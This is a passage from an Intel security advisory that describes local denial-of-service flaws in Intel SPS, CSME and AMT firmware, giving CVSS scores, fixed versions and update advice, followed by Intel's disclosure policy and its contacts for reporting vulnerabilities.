Description: Improper input validation in firmware for Intel(R) SPS before version SPS\_E3\_04.01.04.700.0 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 7.3 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H

CVEID: CVE-2022-29515

Description: Missing release of memory after effective lifetime in firmware for Intel(R) SPS before versions SPS\_E3\_06.00.03.035.0 may allow a privileged user to potentially enable denial of service via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

**Affected Products:**

Intel® CSME before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25.

Intel® AMT before versions 11.8.93, 11.22.93, 12.0.92, 14.1.67, 15.0.42, 16.0.

Intel® SPS before versions SPS\_E3\_04.01.04.700.0, SPS\_E3\_06.00.03.035.0.

**Recommendations:**

Intel recommends that users of Intel® CSME, Intel® AMT and Intel® SPS update to the latest version provided by the system manufacturer that addresses these issues.

**Acknowledgements:**

These issues were found internally by Intel employees.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Tag

#firefox